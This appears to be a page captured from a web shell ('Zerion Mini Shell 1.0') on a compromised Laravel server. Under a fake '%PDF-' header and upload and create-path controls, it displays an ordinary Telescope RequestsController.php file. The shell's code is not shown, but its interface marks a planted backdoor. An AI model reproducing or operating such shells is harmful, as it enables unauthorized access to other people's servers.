%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/pjcold2/vendor/laravel/telescope/src/Http/Controllers/
Upload File :
Create Path :
Current File : //var/www/pjcold2/vendor/laravel/telescope/src/Http/Controllers/RequestsController.php

<?php

namespace Laravel\Telescope\Http\Controllers;

use Laravel\Telescope\EntryType;
use Laravel\Telescope\Watchers\RequestWatcher;

class RequestsController extends EntryController
{
    /**
     * The entry type for the controller.
     *
     * @return string
     */
    protected function entryType()
    {
        return EntryType::REQUEST;
    }

    /**
     * The watcher class for the controller.
     *
     * @return string
     */
    protected function watcher()
    {
        return RequestWatcher::class;
    }
}

Zerion Mini Shell 1.0